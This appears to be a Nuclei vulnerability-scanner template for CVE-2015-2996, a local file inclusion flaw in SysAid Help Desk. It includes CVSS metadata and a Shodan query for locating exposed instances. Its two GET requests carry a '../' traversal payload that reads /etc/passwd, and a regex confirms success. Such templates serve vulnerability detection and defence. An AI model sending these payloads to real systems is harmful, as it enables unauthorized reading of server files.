id: CVE-2015-2996 info: name: SysAid Help Desk <15.2 - Local File Inclusion author: 0x_Akoko severity: high description: | SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum. reference: - https://seclists.org/fulldisclosure/2015/Jun/8 - https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk - http://seclists.org/fulldisclosure/2015/Jun/8 - https://nvd.nist.gov/vuln/detail/CVE-2015-2996 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C cvss-score: 8.5 cve-id: CVE-2015-2996 cwe-id: CWE-22 epss-score: 0.77754 cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.favicon.hash:1540720428 vendor: sysaid product: sysaid tags: cve,cve2015,sysaid,lfi,seclists http: - method: GET path: - "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd" - "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd" stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200